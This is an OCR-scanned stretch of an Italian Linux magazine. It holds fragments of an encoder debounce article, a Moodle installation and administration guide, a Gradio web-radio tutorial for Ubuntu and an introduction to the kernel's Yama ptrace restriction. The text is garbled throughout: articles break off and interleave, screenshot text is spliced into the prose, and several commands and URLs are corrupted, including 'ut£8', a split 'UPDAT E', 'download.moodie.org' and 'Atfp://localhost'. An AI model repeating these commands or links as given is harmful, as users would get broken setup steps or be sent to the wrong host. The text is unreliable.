racchiude il fronte di salita vedremo una serie di impulsi spuri 
(Figura 2, schermo in alto nella metà inferiore). Eseguiamo la 
stesa prova collegando ora i due canali dell’oscilloscopio dopo il 
filtro RC. Il risultato, come evidente dalla Fig. 2 in basso, mostra 
® Fig. 3 è Schema test per la valutazione dei rimbalzi assenza totale di impulsi spuri con fronte di salita addolcito. 
dovuti ai contatti dell’encoder Per ogni problema e/o domanda è possibile fare riferimento al 
forum di Linux Magazine (www.linux-magazine.it/forum/). 
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® Fig. 4 e Una panoramica del metronomo su breadboard 
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possibile avere una scuola basata su un modello didat- 
tico differente da quello tradizionale che possa ren- 
dere l’apprendimento più stimolante e affascinante? 
Molti studi psico-pedagogici l’importan- 
za di adottare un modello didattico che possa essere in gra- 
do di coinvolgere gli studenti facendoli diventare parte at- 
tiva al processo di apprendimento, stimolando lo sviluppo 
della capacità di dialogo e di ascolto, abbandonando il tradi- 
zionale approccio basato sulla lezione frontale che mira inve- 


sottolineano 


ce a far acquisire il maggior numero di nozioni. Insomma, è 
necessaria una nuova generazione di scuola, una scuola 2.0. 
In queste pagine scopriremo Moodle, una piattaforma di appren- 
dimento dinamico e modulare, che può essere utilizzata come 
strumento di supporto alla didattica, inteso non come un sostituto 
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username o la 
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Alcuni corsi possono 
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ospiti 


Login come ospite 


È la prima volta che accedi qui? 


Per accedere al sito devi creare un account. 


Crea un account 


Fig. 1 L'interfaccia di Login di Moodle 
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LA SCUOLA 
DEL FUTURO 
È GIÀ QUI! 


Moodle è la piattaforma di e-learning Open Source più 
amata dai docenti. Ecco come installarla e configurarla 


Luigi Santangelo 


del docente ma finalizzato ad allargare il dialogo tra docente e 
discente al tempo extrascolastico. 


UNA NUOVA SCUOLA 


L'introduzione delle nuove tecnologie, la nascita dei tablet e de- 
gli smartphone, la rapida diffusione delle reti Wi-Fi e delle piatta- 
forme di social network hanno portato profondi cambiamenti nel 
mondo del lavoro. Il mercato chiede personale sempre più compe- 
tente, dotato di buone conoscenze, elevate capacità comunicative e 
di problem solving, che sia in grado di collaborare con gli altri per 
raggiungere gli obiettivi di business. Scuola ed università devono 
essere in grado di rispondere alle richieste del mercato e pertanto, 
sono costrette ad evolvere e ad adattarsi alle spinte innovative pro- 
venienti dall'ambiente. 

Il tradizionale approccio didattico, che vede il docente al centro 
del processo di insegnamento, non è più efficace. Per questo moti- 
vo, negli ultimi anni, si sta assistendo, anche nella scuola italiana, 
all’introduzione di un nuovo modello didattico in cui il ruolo del 
docente e dello studente sta cambiando: è comunque l’esperto di- 
sciplinare, la fonte della conoscenza, ma assume la figura di guida, 
favorendo il costruttivismo sociale, stimolando gli studenti a co- 
struire da soli il proprio sapere. Ovviamente, la tecnologia, anche 
in questo processo innovativo, rappresenta un indispensabile mez- 
zo per raggiungere il fine. Il docente infatti dovrà utilizzare le piat- 
taforme informatiche sulle quali verranno pubblicati video-tutorial 
e mappe multimediali, che verranno consultati dagli studenti per 
acquisire quel necessario “saper fare” che potrà essere speso nel 
mondo del lavoro. Lo studente potrà quindi imparare con la tecno- 
logia, ma, attenzione, non dalla tecnologia. Per raggiungere questo 
ambizioso progetto, in Italia è stato approvato, e in molte scuole è 
già realtà, il piano nazionale Scuola Digitale, proposto dal Ministe- 
ro dell’Istruzione, dell’Università e della Ricerca, che ha lo scopo 
di definire una strategia di innovazione della scuola italiana. Il pia- 
no prevede l’avvio in tutte le scuole di progetti finalizzati all’in- 
troduzione di strumenti tecnologici e device multimediali, quali 
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le Lavagne Interattive Multimediali (LIM), la predisposizione di 
aule informatizzate e di connessioni Wi-Fi, l’utilizzo del registro 
elettronico e dei sistemi di rilevamento automatico delle presenze, 
avviando un processo di dematerializzazione e facilitando la co- 
municazione tra scuola e famiglia. 


E-LEARNING E MOODLE 


Con il termine “piattaforme di e-learning” si intende l’insieme di 
tutti gli strumenti informatici che offrono agli studenti la possibi- 
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Home del sito 


lità di interagire elettronicamente con gli altri membri della classe 
virtuale e con l’insegnante. In commercio esistono molti sistemi 
che permettono di raggiungere questo obiettivo. Moodle rappresen- 
ta la soluzione che ha registrato un notevole incremento dell’inte- 
resse da parte degli operatori della formazione nel corso degli ulti- 
mi anni. Moodle è un Learning Management System (LMS) Open 
Source di tipo modulare il cui sviluppo e design sono guidati dal 
modello pedagogico del costruttivismo sociale, che considera gli 
alunni i principali responsabili dell’apprendimento. Secondo que- 
sto modello, l’acquisizione di conoscenza rappresenta il risultato 
dell’interpretazione dell’esperienza personale di ciascun soggetto. 


UN PO' DI STORIA 


La parola Moodle è l’acronimo di Modular Object-Oriented Dy- 
namic Learning Environment. Nasce grazie a Martin Dougia- 
mas nel lontano 2002, quando venne rilasciata la prima versione 
stabile. AI momento in cui scriviamo, è invece disponibile per il 
download la versione 3.2, proprio quella che abbiamo utilizza- 
to durante i nostri test. Moodle è un sistema multi-piattaforma, 
scritto in PHP, che può appoggiarsi su diversi sistemi di gestione 
dei dati quali MySQL, PostgreSQL, Oracle e SQL Server. Attual- 
mente, oltre 72.000 organizzazioni in 232 Paesi hanno dichiarato 
di utilizzare Moodle come strumento di supporto alla didattica. 
In cima alla top 10 figurano gli Stati Uniti d'America, con oltre 
10.000 registrazioni. L'Italia, si piazza al settimo posto con poco 
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più di 2.300 organizzazioni. 


SETUP IN CORSO 


Dopo aver scaricato l’ultima versione dal sito ufficiale del progetto 
(http://download.moodie.org), decomprimiamo il pacchetto e spo- 
stiamo l’intero contenuto all’interno della document root di Apa- 
che: 


unzip moodle-latest-32.zip 
mv moodle /var/www/html 


Creiamo quindi un database, denominato ad esempio moodle, che 
ospiterà dati e metadati necessari al corretto funzionamento della 
piattaforma: 


mysql -u root -p 
mysql> CREATE DATABASE moodle DEFAULT 
CHARACTER SET ut£8 COLLATE 
utf8 unicode ci; 


Passiamo ora alla creazione dell’utente moodleuser e assegniamo 
il completo controllo sul database appena creato: 


mysql> GRANT SELECT, INSERT, UPDAT 
E, DELETE, CREATE, CREATE TEMPORARY 
TABLES, DROP, INDEX, ALTER ON moodle.* TO 
moodleuser@localhost IDENTIFIED BY 
moodlepassword; 


L’installazione di Moodle avviene attraverso una procedura gui- 
data a cui si può accedere puntando il browser alla pagina Atfp:// 
localhost/moodle. Dopo aver specificato la lingua da utilizzare du- 
rante l’installazione, viene verificata la compatibilità del sistema. 
Dovranno pertanto essere presenti nel sistema alcune estensioni 
che Moodle utilizzerà per il corretto funzionamento di moduli. Per 
procedere sarà quindi necessario installare tutti i requisiti indicati. 
Successivamente, dovranno essere indicati i parametri di connes- 
sione al database, ovvero il nome e la password dell’utente creato 
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(nel nostro caso moodleuser), il nome del database e l’host nel qua- 
le si trova il DBMS. Il processo di installazione verrà completato 
specificando il nome e la password dell’amministratore della piat- 
taforma, il suo indirizzo e-mail e il nome che dovrà apparire nella 
home page del sistema. 


L'ARCHITETTURA MODULARE 


Moodle è composto da vari moduli indipendenti denominati 
plug-in. Per comprendere meglio l’intera architettura di Moodle, 
possiamo suddividere tutti i moduli in cinque differenti gruppi in 
base al loro scopo e uso: 


e moduli amministrativi 

e moduli di gestione dei corsi 
e moduli studente 

e moduli di produttività 

e moduli di comunicazione 


MODULI AMMINISTRATIVI 


Attraverso questi moduli l'amministratore della piattaforma ge- 
stisce l’intero sistema. Rientrano in questa categoria i moduli di 
gestione degli utenti e delle relative autenticazioni, i moduli di 
gestione delle modalità di integrazione con altre piattaforme e il 
sottosistema per la connessione alla base dati. 

L’accesso ai moduli amministrativi avviene selezionando la voce 
di menu Amministrazione del sito, visibile sulla barra laterale 
sinistra dell’interfaccia. In questa sezione è possibile creare nuo- 
vi utenti e, come vedremo più avanti, assegnare il ruolo a ciascun 
account. Di default è già presente un insieme minimale di ruoli 
che possono essere assegnati agli utenti, quali Studente, Docente, 
Manager, Utente autenticato e Ospite. Tuttavia nuovi ruoli con i re- 
lativi privilegi possono essere creati tramite Gestione Ruoli nella 
sezione Autorizzazioni della scheda Utenti. 

Moodle offre una ricca dotazione di moduli per la gestione 
dell’autenticazione degli utenti. Questi variano dal più semplice, 
che prevede la registrazione manuale da parte dell’utente, a me- 
todi più complessi e sicuri come LDAP, Shibboleth o RADIUS. 
Il metodo di autenticazione predefinito è quello manuale, in cui 
l'amministratore crea l’account dell’utente, gli assegna una pas- 
sword e il profilo a cui appartiene. È tuttavia possibile abilitare 
la creazione automatica dell’account che prevede l'inserimento 
dell’username e dell’indirizzo e-mail da parte dell’utente, tra- 
mite un processo di registrazione. Al termine, il sistema invia 
all’utente una mail contenente un link attraverso il quale potrà 
procedere con il reset della password. Per abilitare questa funzio- 
nalità, selezioniamo la voce Plugin dal menu Amministrazione 
del Sito, quindi clicchiamo su Gestione Autenticazione. Spostia- 
moci quindi in corrispondenza dell’etichetta Auto Creazione Ac- 
count, quindi selezioniamo la voce Account via Email. In questo 
modo, al login, verrà mostrata la sezione che consente all’utente 
la creazione del proprio account (Fig. 1). Generalmente, però, 
un'organizzazione che adotta Moodle come sistema di supporto 
alla didattica, molto probabilmente avrà già i propri utenti censiti 
all’interno del sistema di gestione delle identità digitali. Al fine di 


consentire l’utilizzo delle credenziali di cui gli utenti sono già in 
possesso e che molto probabilmente utilizzano per l’accesso ai si- 
stemi legacy, Moodle offre un nutrito set di plug-in che consento- 
no l’interazione della piattaforma con i più diffusi sistemi di auten- 
ticazione. Ad esempio, molte organizzazioni preferiscono gestire gli 
utenti attraverso un server LDAP che fornisce servizi di directory a 
cui possono accedere i client recuperando i valori memorizzati negli 
attributi. In questo caso è possibile utilizzare il modulo denominato 
Server LDAP, specificando i parametri di configurazione per l’ac- 
cesso al server, quali il nome dell’host, il nome dell’utente e la pas- 
sword con cui dovrà avvenire l’accesso al server, il nome dell’unità 
organizzativa nella quale saranno presenti i nominativi degli utenti 
e il nome dell’attributo sul quale dovrà avvenire la ricerca dell’user- 
name da autenticare. 


MODULI DI GESTIONE DEI CORSI 


Sono tutti i moduli accessibili solo dall'’amministratore e dai docenti 
autorizzati a modificare il corso. Rientrano in questa categoria i mo- 
duli che permettono di definire i corsi di studio, pubblicare il mate- 
riale didattico, valutare gli esami degli studenti e tracciarne il loro 
andamento. Moodle organizza i corsi in categorie. Ad esempio, po- 
trebbe essere utile raggruppare i corsi di studio per settore scientifico 
disciplinare, oppure per anno di corso e così via. L’accesso ai moduli 
di gestione dei corsi avviene selezionando la voce di menu Ammi- 
nistrazione del sito, quindi Corsi. In questa sezione sarà possibile 
creare la gerarchia di categorie a cui associare i corsi. La creazione di 
un corso invece richiede l’indicazione del titolo del corso, la categoria 
di appartenenza, la data di inizio e di fine ed altre eventuali informa- 
zioni che riguardano il numero di lezioni, l’eventuale gestione degli 
studenti per gruppi e così via (Fig. 2). Durante la creazione del corso 
deve inoltre essere specificato il formato del corso che definisce il 


modo in cui il contenuto del corso, ovvero gli argomenti, devono es- 
sere mostrati agli studenti. Il formato predefinito è “Per Argomenti”. 
Utilizzando questa impostazione, il corpo centrale della home page 
del corso sarà suddiviso in sezioni, una per ogni argomento, il cui 
numero può essere specificato in fase di configurazione. È tuttavia 
possibile definire formati differenti, come ad esempio il-formato “Fo- 
rum”, in cui gli argomenti verranno visualizzati in maniera analoga 
a un forum, oppure nel formato “Singola Attività”, in cui verrà vi- 
sualizzato un singolo argomento, o infine nel formato “Settimanale” 
in cui il corpo centrale della home page del corso viene suddiviso in 
sezioni settimanali corrispondenti alla durata del corso. 

L'iscrizione a un corso da parte di un utente (studente o docente), di 
default avviene manualmente. L'amministratore pertanto dovrà spe- 
cificare gli utenti che potranno accedere al corso, seguire le attivi- 
tà didattiche, partecipare alle esercitazioni e sostenere gli esami. In 
questo caso l'amministratore, dopo aver selezionato il corso, avrà la 
possibilità di specificare il docente e gli studenti selezionando Iscri- 
zioni (Fig. 3) quindi, tramite il pulsante Iscrivi Utenti, selezionare 
gli utenti da iscrivere al corso. Ciascun utente avrà un ruolo (di de- 
fault Studente) che potrà essere modificato cancellando il ruolo pre- 
definito e inserendo quello corretto. Moodle di default definisce due 
differenti ruoli di tipo Docente. Il primo, denominato semplicemente 
Docente, consente l’inserimento del materiale didattico all’interno 
di un corso, ma non viene data la possibilità di modificare le impo- 
stazioni del corso stesso. Il Docente Editor invece, non ha limiti 
all’interno del corso al quale è iscritto. La creazione di nuovi ruoli è 
già stata descritta nel precedente paragrafo. 

Grazie ai plug-in di Moodle è possibile anche consentire l’iscrizione 
ad un corso da parte degli studenti, in modo che ciascun utente possa 
liberamente scegliere il corso da frequentare. A tale scopo, dal menu 
visibile nella barra laterale destra, selezioniamo il corso di interesse, 
quindi, selezioniamo la voce Partecipanti, e infine, utilizzando il 
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pulsante con l’icona a forma di ingranaggio, selezioniamo la voce 
Metodi di Iscrizioni e abilitiamo la voce Iscrizione Spontanea 
(Fig. 4). In questo modo, chiunque, dopo aver fatto accesso alla piat- 
taforma, potrà autonomamente iscriversi al corso. 

Ogni corso di studio è composto da uno o più Topic che rappresenta- 
no gli argomenti trattati. Ogni Topic può contenere una o più lezioni, 
chiamate anche Attività o Risorse. Ciascuna lezione può essere ero- 
gata attraverso uno specifico formato. Così, ad esempio, è possibile 
inserire un'attività sotto forma di lezione oppure come sondaggio, 
come quiz, e così via. La scelta della tipologia di risorse da inserire 
all’interno di un corso dipende dagli obiettivi didattici che il docen- 
te ha stabilito durante la preliminare fase riguardante la definizione 
degli obiettivi e del percorso di apprendimento, tenendo ovviamente 


Aggiungi criterio... 


Fig. 6 © | diversi criteri da applicare sulle attività 


conto del target di studenti e delle eventuali difficoltà che questi pre- 
sentano. Una lezione si compone di una o più pagine di contenuto. 
Questo consente la suddivisione della lezione in sezioni. Le pagine 
saranno tra di loro collegate attraverso dei pulsanti che consentiranno 
la navigazione tra le diverse sezioni. La creazione di una nuova pa- 
gina avviene attraverso il pulsante di modifica che verrà visualizzato 
dopo il salvataggio della lezione (Fig. 5). L'organizzazione di una 
lezione per pagine facilita l'apprendimento da parte dello studente, 
il quale potrà interrompere lo studio della lezione al termine di una 
pagina e riprendere con la successiva in un secondo momento. 

Un'altra risorsa che può essere inserita in un corso è il Quiz che 
consente al docente di creare questionari di diversi tipi, ad esempio 
scelta multipla, vero o falso, risposta aperta, e così via. È possibile 
configurare il quiz in modo che possa essere fatto solo una volta o più 
volte. Generalmente il quiz viene utilizzato per gli esami o per dare 
allo studente un feedback sulla comprensione dell’argomento studia- 
to. L'inserimento del quiz avviene in maniera analoga all’inserimento 
della lezione, con la sola differenza che dovrà essere selezionata la 
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corrispondente voce Quiz nell’elenco delle risorse disponibili. Ad 
ogni quiz è possibile indicare il periodi di apertura e di chiusura, che 
definiscono l’intervallo temporale durante il quale il test dovrà essere 
accessibile agli studenti. 

La gestione di un corso potrà essere effettuata in maniera autonoma 
da ciascun docente abilitato il quale, oltre ad inserire il materiale di- 
dattico potrà visualizzare l’elenco degli studenti che hanno presenta- 
to l’iscrizione al corso, pubblicare le verifiche di apprendimento, ana- 
lizzare gli esiti degli studenti utilizzando le serie storiche e così via. 

Durante la definizione degli argomenti e delle risorse è possibile 
specificare le eventuali condizioni di accesso degli studenti. È pos- 
sibile infatti limitare l’accesso a un argomento ai soli studenti che 
soddisfano specifici requisiti. Moodle permette di specificare cinque 
differenti categorie di criteri (Fig. 6): criteri sul completamento 
delle attività (ad esempio, un argomento può essere visualizzato 
solo se lo studente ha completato un argomento precedente), criteri 
basati sulla data e sull’ora (ad esempio, un argomento può essere 
visualizzato solo in uno specifico intervallo temporale), criteri sul- 
la valutazione (ad esempio, se lo studente ha avuto una valutazione 
sufficiente all’ultimo quiz), criteri sul profilo dell’utente (ad esem- 
pio, se il cognome dello studente inizia per A) o ancora un insieme 
di criteri che consentono l’implementazione di logiche complesse. 


MODULI STUDENTE 


Attraverso questi moduli gli studenti possono seguire le attività 
didattiche, svolgere le esercitazioni e i test di autovalutazione e 
sostenere gli esami. Dopo aver ricevuto le credenziali di accesso 
alla piattaforma, lo studente ha la possibilità di navigare all’interno 
delle diverse categorie di corsi che sono state definiti dall’Ammi- 
nistratore o dal Docente Editor. Se previsto dalla configurazione 
del corso, lo studente potrà formalizzare l’iscrizione utilizzando il 
relativo pulsante che verrà mostrato dopo aver selezionato il corso 
di interesse. L'iscrizione ad un corso è prerequisito per poter par- 
tecipare alle attività didattiche e sostenere le prove di valutazione. 
Accedendo alle lezioni, le attività verranno mostrate in base alla 
loro tipologia. Ad esempio, nel caso di una attività di tipo lezione, 
i contenuti verranno mostrati sotto forma di pagine collegate tra 
di loro attraverso un pulsante. Se previsto durante la definizione 
del corso, verrà anche mostrata l’informazione sulla quantità di le- 
zioni già completata e su quella rimanente (Fig. 7). Lo studente 
potrà interrompere lo studio della lezione in qualsiasi momento e al 
successivo accesso alla piattaforma il sistema consentirà l’accesso 
alla pagina successiva. Dopo aver selezionato un corso, lo studente, 
attraverso il pulsante Partecipanti, ha la possibilità di conoscere 
l’elenco degli altri studenti che stanno frequentando il suo stesso 
corso. Selezionando ciascun partecipante, potrà accedere a tutte le 
informazioni pubbliche inserite sul proprio profilo e che potranno 
essere modificate selezionando la voce Profilo dal menu che appare 
selezionando il nome dell’utente visibile nella barra in alto a destra. 


MODULI DI PRODUTTIVITÀ 


Si tratta di moduli di supporto all’apprendimento quali ad esempio 
il modulo di ricerca, il calendario, il modulo che mostra i progres- 
si e lo stato di avanzamento delle attività degli studenti. La mag- 
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Bi Introduzione 


Il Modello a Cascata 
Lo sviluppo del software negli anni '90 


Lo sviluppo del software nella società moderna avviene in maniera piuttosto differente da 


By Lo Sviluppo del 
Software 


come avveniva agli inizi degli anni 90. Trentanni fa infatti, lo sviluppo del software non era 
guidato da alcun modello: i programmi avevano dimensioni piuttosto limitate anche a 


causa delle limitate risorse fisiche disponibili nelle architetture dell'epoca. Il 


Classi ed Oggetti 


programmatore pertanto sviluppava piccole applicazioni in completa autonomia. Con lo 


svilupopo tecnolgico e la nascita di sistemi sempre più potenti in termini di capacità di 


| Costrutti 


calcolo e di memoria, anche le applicazioni sono iniziate a diventare sempre più grandi, 


sempre più complesse, sempre più rispondenti alle richieste di un mercato sempre più 


Java Enterprise esigente. 


Dashboard 
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Fig. '7 ® L'accesso ad una lezione con l'indicazione della quantità di di lavoro completato 


gior parte di questi moduli si presentano sotto forma di blocchi e 
possono essere inseriti o rimossi da parte dell’amministratore in 
qualsiasi parte dell’interfaccia grafica. Particolarmente utile per lo 
studente è sicuramente il blocco denominato “I miei corsi” che mo- 
stra l’elenco di tutti i corsi a cui lo studente risulta essere iscritto, 
nonché tutte le informazioni necessarie a contattare i docenti, il 
programma degli esami, ed eventuali altre informazioni. Un altro 
strumento particolarmente interessante è il calendario, nel quale 
vengono man mano mostrate tutte le informazioni sulla didattica 
di interesse per lo studente, come ad esempio le date di inizio e 
di fine delle lezioni, i giorni in cui sono previsti i quiz, eventuali 
scadenze e così via. i 


MODULI DI COMUNICAZIONE 


Sono tutti i moduli che possono essere utilizzati dagli utenti della 
piattaforma per inviare comunicazioni ad altri utenti, quali docenti 
o studenti. Rientrano in questa categoria le chat in tempo reale e 
i forum. Questi ultimi due strumenti sono gestiti da Moodle come 
tutte le altre risorse. Un forum o una chat pertanto possono essere 
inseriti in maniera assolutamente analoga a come viene inserita una 
lezione all’interno di un corso e, analogamente a quest’ultima, anche 
per i forum e per le chat è possibile definire permessi e vincoli di 
accesso. Così, ad esempio è possibile definire l’orario in cui una chat 
potrà essere accessibile e quali utenti possono accedervi, o ancora, 
nel caso dei forum è possibile definire le modalità di sottoscrizione e 


gli interventi degli utenti. 

L'amministratore inoltre può attivare anche altri blocchi che 
facilitano la diffusione di informazioni, come ad esempio il 
blocco “Ultime notizie”, “Prossimi eventi” o, infine, il blocco 
“Attività recenti”. I primi due blocchi, offrono la possibilità agli 
studenti di essere aggiornati rapidamente sulle novità relative al 
corso, mentre il blocco “Attività recenti” mostra le ultime risor- 
se o attività inserite dal docente, inclusi i messaggi nei forum. 
Un altro interessante strumento di comunicazione offerto da 
Moodle permette di sottoporre dei sondaggi agli studenti. Gra- 
zie al sondaggio, i docenti hanno la possibilità di richiedere agli 
studenti eventuali informazioni non necessariamente collegate 
al contenuto dei corsi. 


CONCLUSIONI 


Queste pagine vogliono essere una panoramica delle numerose 
funzionalità offerte da Moodle, uno strumento in grado di stimo- 
lare e facilitare il processo di apprendimento degli studenti. Tut- 
tavia, questa tecnologia non deve essere considerata una panacea 
in grado di rendere tutti più dotti e sapienti, sarebbe un po' troppo 
presuntuoso. Come i tradizionali strumenti di supporto alla di- 
dattica, quale la lavagna, anche le moderne tecnologie non assi- 
curano alcun risultato perché tutto dipende dalla capacità degli 
insegnanti e dall'impegno costante che ciascun allievo dovrebbe 
mantenere durante l’intero percorso di apprendimento. 
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onostante gli anni passino e la tecnolo- 

gia spinge sempre di più sul Web, le ra- 

dio FM mantengono il loro fascino, così 
come l'interesse da parte del pubblico non sembra 
calare più di tanto. Come molti di noi sapranno già, 
la maggior parte delle più note stazioni radiofoni- 
che hanno comunque realizzato una loro variante 
web, che consente a qualsiasi internauta di ogni an- 
golo di mondo di ascoltare la propria radio preferi- 
ta, abbattendo di fatto i limiti della‘imodulazione di 


RADIO FM? 
ASCOLTALA DAL PG 


Con Gradio puoi ascoltare per le tue stazioni radiofoniche 
preferite direttamente dal desktop di Ubuntu 


frequenza (FM). Su GNU/Linux esistono decine 
e decine di differenti software che ci permettono 
di organizzare ed ascoltare la lista delle web radio 
che più gradiamo e noi abbiamo deciso di mettere 
alla prova Gradio, uno dei più completi ed apprez- 
zati. Gradio offre un database di web radio deci- 
samente nutrito e, soprattutto, sempre aggiornato. 
In più, consente di filtrare l'elenco delle stazioni 
disponibili anche in base al genere o alla lingua. 
Passiamo dalla teoria alla pratica! 


Setup semplice e veloce 


Vuoi installare Gradio su Ubuntu? Ecco come fare 


VISSERO VRET Ae Ri0E - 


. vir 1-S sudo add-apt-repository ppa:h 
udo] password di vincosentux: 


Please ‘ignore the "daily" in the name. This PPA is stabl 


: https://github.com/haecker-felix/gradio 
: https://github.com/haecker-felix/gradio/issues 
https://github.com/haecker-felix/gradio/wiki 


Stats: https://github.com/haecker-felix/gradio/graphs/coni 
Maggiori informazioni: https://Launchpad.net/-haecker-fe 


Premere [INVIO] per continuare o Ctrl+C per annullare 


Avviamo il terminale e da qui lanciamo il comando 

sudo add-apt-repository ppa:haecker-felix/gradio- 
daily. Così facendo aggiungeremo il PPA di Gradio. Nonostante 
la parola “daily” si tratta comunque di un software stabile. 


bvincosentux + 


Tutto è pronto per procedere all'installazione di 
Gradio. Sempre da terminale, digitiamo il comando 

sudo apt-get install gradio e lanciamolo con Invio. Il setup è 

veramente rapido, considerato il peso irrisorio del software. 
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vincosentux@vincosentux: — 
vi udo add-apt 


r 
to il trustdb 
Launchpad PPA for Felix Hacker n 


Non appena il PPA sarà stato aggiunto al sistema, 

non ci resta che aggiornare l'elenco dei pacchetti. 
Per farlo, lanciamo il solito sudo apt-get update ed attendiamo 
la fine dell'operazione (dura giusto una manciata di secondi). 


® o 


Empty Library 


Du: 
Possiamo avviare ora il programma che ci permette 
di ascoltare le stazioni radiofoniche tramite Inter- 
net. Sempre da terminale, lanciamo gradio ed ecco apparire la 
semplice interfaccia grafica di Gradio. 


Tutta la musica che vuoi tu! 


Avviamo la riproduzione di una stazione radiofonica e personalizziamo l'aspetto di Gradio 


tutte le stazioni radiofoniche disponibili. Per filtrare 
quelle in lingua italiana, clicchiamo sul pulsante Languages e 
da qui selezioniamo Italian. Tutte quelle disponibili vengono 
mostrate a schermo. 


TUTTO PRONTO 

A questo punto, il sistema ci elencherà tutti i pac- 

chetti che devono essere scaricati. Clicchiamo su 
Continua e confermiamo digitando la password di amministra- 


zione del sistema. Al termine, riavviamo Gradio e verifichiamo 
che la riproduzione sia ora funzionante. 


RADIO PREFERITE 

Nella barra di stato di Gradio viene visualizzato il 

nome della stazione radio attualmente in riprodu- 
zione. Se vogliamo aggiungerla ai preferiti e ritrovarla dunque 


nel tab Library (schermata principale di Gradio) clicchiamo 
sull'icona a forma di stella (in basso a destra]. 


STAZIONI ITALIANE 
Spostiamoci nel tab Discover per scoprire l'elenco di 


MANCA UN PLUG-IN? 
102, Proviamo a lanciare la riproduzione. Per farlo, basta 
un clic sul nome della stazione che più preferiamo. 
Se manca qualche plug-in fondamentale per l'ascolto, Gradio 


ce lo lo comunicherà e, nella nuova finestra che appare, clic- 
chiamo sul pulsante Installa. 


CONTROLLO TOTALE 

Gradio può essere controllato anche tramite l'AppIn- 

dicator di Ubuntu dedicata all'audio. Oltre al volume 
degli speaker, nell'AppIndicator vengono mostrati anche i 


controlli che ci permettono di mettere in pausa la riproduzione 
di Gradio o di cambiare stazione radiofonica. 


INTERFACCIA PERSONALIZZATA |, 
In alto a destra, proprio accanto al campo di ricerca, 
è presente il menu principale di Gradio (tre linee pa- 
rallele orizzontali). Clicchiamolo e spostiamoci in Settings. Da 
qui possiamo personalizzare l'aspetto del software eliminando 
ad esempio alcuni filtri di ricerca. 
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ggigiorno le varie distribuzioni, in particolar modo 

quelle dedicate al “grande pubblico”, giungono agli 

utenti con kernel tali da dover soddisfare le esigen- 
ze di una variegata platea: si pensi, ad esempio, al numero e 
tipo di periferiche che un utente medio desktop può utilizzare. 
Molto probabilmente saranno diverse da quelle utilizzate da un 
altro utente GNU/Linux in un'altra parte del mondo. Trattasi 
di kernel nei quali vengono abilitate un’infinità di opzioni che 
faranno parte o dell’immagine statica del kernel — ovvero del 
blocco “monolitico” caricato in fase di avvio - o come mo- 
duli caricabili a run-time e presenti in /lib/modules/"uname 
«r". Le funzioni abilitate, così come un certo numero di driver 
caricati o da poter caricare con il comando modprobe nome_ 
modulo, in buona percentuale dei casi risulteranno totalmente 
inutili e ancor di più se pensiamo ad un server per il quale non 
è necessario che il sistema risulti user-friendly (amichevole), 
ciò che conta è la sicurezza e la stabilità del sistema, sia lato 
kernel così come nel software installato. 


SICUREZZA E KERNEL 


Se vogliamo raggiungere un buon grado di sicurezza, ancor 
di più se la macchina è un server, occorre sapersi costruire 
un kernel ad-hoc specifico per quella macchina attivando solo 


IL KERNEL È TUO AMICO! 
Ecco quali sono i moduli affini 


Coloro i quali volessero un promemoria sugli argomenti 
fin qui affrontati per quella specifica sezione del kernel, 
ricordiamo SELinux, AppArmor e Tomoyo. Alla lista 
aggiungiamo, anche se non fa parte della sezione indicata, 
LKM (Loadable Kernel Module) per i moduli caricabili a 
run-time sui root-kit in kernel space. 
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UNA CHIAMATA 
OTENZIALMENTE 
INSIGURA 


Forse non lo sai, ma il kernel del Pinguino ti aiuta 
a tracciare ogni chiamata di sistema. Il tutto, 
grazie alla funzione Yama. Ecco come utilizzarla 


ciò che realmente ci occorre, secondo la ben nota metafora, 
tutto quello che non c'è, non si può rompere! Non si può che 
concordare fosse solo per un motivo logico. Ad esempio, che 
senso avrebbe attivare il supporto audio per un server che non 
ne farà mai uso? O ancora il supporto per i joystick o per un 
dato file system non in uso o periferiche SCSI non utilizzate? 
Per ottenere un risultato mirato occorre saper scaricare, ap- 
plicare eventuali patch, configurare, (ri)compilare, e installare 
un kernel partendo dai sorgenti. Operazioni, queste, che pos- 
sono incutere un po' di timore, ma dal punto di vista pratico 
si risolvono nel lanciare un certo numero di comandi che in 
questa sede esulano dal contesto. Molto più difficile, invece, 
è il tuning delle singole voci del kernel, di quello che ci oc- 
corre realmente, poiché le opzioni selezionabili oramai hanno 
raggiunto le svariate centinaia. Poiché il compito di una rivista 
è fornire le basi su alcuni concetti e/o aspetti di un dato argo- 
mento — sarà poi cura del lettore approfondire con l’acquisto di 
libri dedicati qualora interessato -, proseguiamo l’analisi della 
sezione Security options del kernel, analizzata diverse volte 
per alcune delle voci che la popolano. 

Questa volta è il turno di Yama, opzione evidenziata in Fig. 1. 
Dall'help in linea, la descrizione riporta, traducendo in Italiano 
le parti di interesse: “Questa opzione seleziona l’opzione Yama 
la quale estende il supporto DAC dei sistemi GNU/Linux [...]. 
Attualmente la funzione disponibile è la restrizione della visi- 
bilità della syscall ptrace [...]. Analogamente alle altre funzio- 
nalità, anche le funzioni di Yama sono accessibili via LSM”. 
Per capire cosa fa e come funziona questa opzione del kernel 
nonché qual è lo scopo che si prefigge, 3 sono le parti sulle 
quali concentrare l’attenzione che esamineremo nel seguito: 


e Estende il supporto DAC con ulteriori impostazioni di sicurezza 
a livello di sistema; 

e L'opzione di sicurezza va ad affiancare gli altri moduli grazie a 
LSM; 

e Disabilita o limita la visibilità della chiamata di sistema ptrace. 


Bookmarks . Impostazioni 


Security options —_ 
Arrow keys navigate the menu. <Enter> selects submenus ---> (or empty submenus ----). Highlighted 


letters are hotkeys. 
<Esc><Esc> to exit, <?> for Help, </> for Search. 
< > module capable 


-*- Enable access key retention support 


Pressing <Y> includes, <N> excludes, <M> modularizes features. 
Legend: [*] built-in 


Press rs 
[ ] excluded <M> module 


- 


[*]. Enable register of persistent per-UID keyrings 


[*] . Large payload keys 
<M> TRUSTED KEYS 
-*-. ENCRYPTED KEYS 


[*] Diffie-Hellman operations on retained keys 
[ ] Restrict unprivileged access to the kernel syslog 


[*] Enable different security models 
-*- Enable the securityfs filesystem 


[*] Socket and Networking Security Hooks 

[*]  XFRM (IPSec) Networking Security Hooks 

[ ] Security hooks for pathname based access control 

[*] Enable Intel(R) Trusted Execution Technology (Intel(R) TXT) 
(65536) Low address space for LSM to protect from user allocation 
[*] Harden memory copies between kernel and userspace 


[*] NSA SELinux Support 
[*] NSA SELinux boot parameter 


(1) NSA SELinux boot parameter default value 


[*] NSA SELinux runtime disable 


[*] NSA SELinux Development Support 


[*] NSA SELinux AVC Statistics 


(1) NSA SELinux checkregprot default value 
[ ] Simplified Mandatory Access Control Kernel Support 


[ ] TOMOYO Linux Support 
AppArmor support 


I 
